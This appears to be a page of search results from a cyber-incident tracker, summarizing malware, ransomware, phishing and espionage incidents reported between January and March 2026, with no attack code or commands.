Search Results for "malware"

Crunchyroll March 12, 2026 • [ data leak, malware, third-party risk ] The Record reported an unidentified threat actor claimed to have breached a Telus employee account in India (a business process vendor for Crunchyroll with access to support tickets). The attacker said they infected the employee device with malware and stole about 100GB of data from Crunchyrolls ticketing system. The outlet reported samples included IP addresses, email addresses, and other information related to customer service tickets. Screenshots showed access to Crunchyrolls platforms including Slack, Zendesk, and Google Workspace; the hacker claimed the breach occurred on March 12, 2026 and that access was revoked within 24 hours.

An undislcosed organization March 12, 2026 • [ ransomware, social engineering, data theft ] IBM X-Force described a case where a threat actor remained on a compromised server for more than a week and stole data during an Interlock ransomware intrusion. The attack began with ClickFix social engineering and later deployed a PowerShell backdoor called Slopoly (likely AI-assisted), alongside other components such as NodeSnake and InterlockRAT. The article is a case-study/campaign description and does not name the victim organization or quantify the affected records beyond describing persistence and data theft.

Undisclosed cryptocurrency organization March 9, 2026 • [ cryptocurrency, social engineering, cloud compromise ] The Hacker News reported (citing Google Cloud) that North Korea-linked UNC4899 conducted a sophisticated 2025 cloud compromise targeting an unnamed cryptocurrency organization, stealing millions in cryptocurrency. The intrusion began with social engineering that tricked a developer into downloading a malicious archive for a supposed open-source collaboration; the developer then transferred the file to a work device via AirDrop. After malicious Python code executed and a binary masquerading as kubectl ran, the attackers pivoted into the cloud environment and abused legitimate DevOps workflows to harvest credentials, escape container confines, and tamper with Cloud SQL databases to modify financial logic enabling theft. This is coded as a confirmed successful intrusion with financial theft.

Undisclosed telecom company in South America March 6, 2026 • [ cyberespionage, threat cluster, malware ] Cisco Talos reported a China-linked threat cluster tracked as UAT-9244 has targeted telecommunications infrastructure in South America since 2024, using multiple implants across Windows, Linux, and edge devices. The toolset described includes TernDoor (Windows), PeerTime (Linux), and BruteEntry (edge devices used for mass scanning and brute forcing services like SSH, Postgres, and Tomcat). The report describes tradecraft and malware but does not identify a single named victim organization or a bounded primary-effect incident suitable for a discrete event record.

Passaic County March 4, 2026 • [ malware, cyberattack, availability disruption ] Passaic County, New Jersey reported a malware attack that disrupted county IT systems and took down phone lines used across government offices. The county first announced the phone outage the morning of March 4 and later confirmed the same day that the outage was caused by a cyberattack. Officials said they were working with federal and state partners to investigate and contain the issue and would provide updates once resolved. No data theft, ransomware demand, or impacted record counts were disclosed in the public statement; the confirmed primary effect is availability disruption affecting communications and IT services.

Undisclosed Israeli individual smartphone March 1, 2026 • [ malware, phishing, spyware ] A trojanized fake Red Alert app delivered through spoofed SMS messages targeted Israeli users and, when installed, enabled theft of messages, contacts, location data, and other device information from affected smartphones.

At least one Hungarian government ministries March 1, 2026 • [ credential leak, infostealer, stealer logs ] Bellingcat identified 795 Hungarian government email/password combinations circulating in breach data across 12 of 13 ministries, including defence, foreign affairs, interior, and finance; stealer logs indicated 97 machines across government departments may have been compromised, with some logs as recent as March 2026.

At least one Ukrainian government organization March 1, 2026 • [ spear-phishing, malware, cyber espionage ] Ghostwriter, also tracked as FrostyNeighbor, UNC1151, UAC-0057, TA445, PUSHCHA, Storm-0257, and related names, conducted a March 2026 spear-phishing campaign against Ukrainian government organizations. The campaign used malicious PDF lures impersonating Ukrtelecom, geofenced delivery to Ukrainian IP addresses, JavaScript PicassoLoader, host fingerprinting, and selective delivery of Cobalt Strike Beacon. Although no specific Ukrainian government agency was publicly named, reporting described successful compromise activity against Ukrainian government targets; no stolen data volume was reported.

Centre for Information Technologies of the State (CTIE) February 26, 2026 • [ malware, data leak, government ] CTIE detected malware on a system used to manage government mobile-device access and later said an external actor accessed device-holder information and device characteristics. The temporary loss of mobile access to internal state services resulted from CTIE isolating the affected system as a precaution.

Undisclosed Middle East entity February 24, 2026 • [ ransomware, cyberattack, data breach ] Symantec and Carbon Black linked Lazarus to a Medusa ransomware attack against an undisclosed Middle East entity; the same reporting noted an unsuccessful attempt against a U.S. healthcare organization, which is not coded here as a successful event.

Local entities in the Cayman Islands (malicious PDF campaign) February 19, 2026 • [ phishing, malware, email security ] RCIPS warned that a malicious PDF was being sent to local entities from a compromised email address. The PDF contained a VIEW PDF link that, when clicked, installs malware; authorities stated they were already aware of some local systems being compromised because recipients clicked the embedded link. The public advisory provided guidance to treat unexpected PDFs as suspicious, avoid clicking the embedded link, and report incidents.

OpenClaw / ClawHub ecosystem (AI assistant skills) â€“ multi-victim campaign February 19, 2026 • [ infostealer, AI assistant security, credential theft ] This TecMundo report describes security researchers warning about OpenClaw, a malware operation that, for the first time, is reported to specifically steal secrets tied to an AI assistant ecosystem (tokens/APIs/other assistant-related data). The article frames the activity as a broad distribution campaign (malicious skills/add-ons and infostealer behavior) that can compromise a victims digital identity by extracting authentication artifacts and credentials used to access accounts and services.

An undislosed cryptocurrency company February 10, 2026 • [ malware, cryptocurrency, AI-generated video ] BleepingComputer reported that North Korean threat actor UNC1069 ran tailored campaigns using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector, with a financially motivated objective.

Cuero Chamber of Commerce January 26, 2026 • [ malware, social engineering, ClickFix ] The Cuero Chamber of Commerce reported a malware/social engineering incident affecting its web properties after a customer noticed suspicious activity in an email sent January 26. The chamber said users registering for an event were shown a CAPTCHA prompt and then instructed to press Windows+R and paste/run contentbehavior consistent with ClickFix social engineering designed to trick victims into executing malicious commands on their own devices. The chamber stated that the Cuero Development Corporation website was the only confirmed security breach and that significant data loss occurred, and it believed the malware was introduced via a third-party platform (Shopify) used for event registration. The chamber said it could not determine how many people or organizations were affected and implemented additional safeguards.

Viafier January 22, 2026 • [ malware, data leak, unauthorized access ] The Swiss rail operator Viafier Retica shut down its Vereina car-shuttle online ticket shop after discovering malware on the system. The organization stated that attackers likely accessed the web shop database, which may contain customer and employee contact details and hashed passwords. Users were advised to change passwords used on other services. The incident caused service disruption to online ticket sales while containment and investigation actions were undertaken.

At least one Afghan government worker January 20, 2026 • [ phishing, malware, data exfiltration ] The Record reported that attackers targeted Afghan government workers with phishing emails disguised as official correspondence from the office of the countrys prime minister. Researchers said the campaign, first detected in December, used a decoy document resembling a government letter (including a forged signature) to entice recipients in ministries/administrative offices to open it. Once opened, the document delivered malware dubbed FalseCub, designed to collect and exfiltrate data from infected computers. The report is focused on the campaign and malware behavior; it does not list specific compromised agencies, confirmed infection counts, or stolen data volumes, so impacts are coded as undetermined.

Medical Practice of Dr. Richard Swift January 12, 2026 • [ malware, cyberattack, data leak ] DataBreaches reported on a class action lawsuit alleging that a Manhattan plastic surgery practice run by Dr. Richard Swift was compromised by a malware-related cyberattack in 2025 and that sensitive patient information was posted online. The suit alleged that a site hosted outside the U.S. displayed personal identifiers and medical record details for at least 22 patients, and that affected patients only learned about the breach after attackers contacted them directly. DataBreaches noted the same threat actors were linked to attacks on other plastic surgery practices and described a recurring pattern where attackers approached patients with demands in exchange for removing posted information. Public reporting did not confirm whether the practice paid, and the article noted the leak site later appeared offline.

Langley Twigg Law January 11, 2026 • [ cyberattack, data breach, malware ] Langley Twigg Law (Napier, New Zealand) stated it was hit by a cyberattack on January 11, 2026. The firm said digital forensics and cyber specialists confirmed a malicious third-party launched a virus on its IT network, which was not protected by its cybersecurity software at the time. The firm reported the attacker extracted a portion of data from its file server containing internal operational information and some client documents. Langley Twigg said it disconnected its network from the internet, notified the Privacy Commissioner and police, and was working to determine exactly what information was affected before contacting impacted clients.

At least one Telecom company in South Asia January 8, 2026 • [ espionage, malware, threat intelligence ] The Hacker News summarized Cisco Talos research attributing espionage-focused intrusions to a China-nexus actor tracked as UAT-7290. The campaign reportedly targets telecom entities in South Asia and Southeastern Europe, performing extensive reconnaissance followed by compromise activity that can lead to deployment of malware families including RushDrop, DriveSwitch, and SilentRaid. The article is threat-intelligence reporting focused on actor behavior, tooling, and geographic targeting, and it does not provide a bounded, single victim incident record with confirmed impact metrics (e.g., downtime or specific data stolen) for one named organization.

At least one Booking.com user January 7, 2026 • [ phishing, social engineering, malware ] Research summarized by Cybernews described a ClickFix social-engineering campaign abusing Booking.com branding. Victims receive phishing emails about a cancelled reservation and a large charge; clicking through leads to a fake Booking.com page with a fake refresh flow and a simulated Blue Screen of Death. The page instructs the user to paste/run a malicious script (PowerShell) via Windows Run, which then fetches and executes remote code, disables Windows Defender, and establishes persistence with C2 connectivity. The link is campaign/threat-intel reporting and does not provide a single confirmed victim organization or a bounded incident count, but it describes successful infections driven by user-executed commands.

Search Results (malware)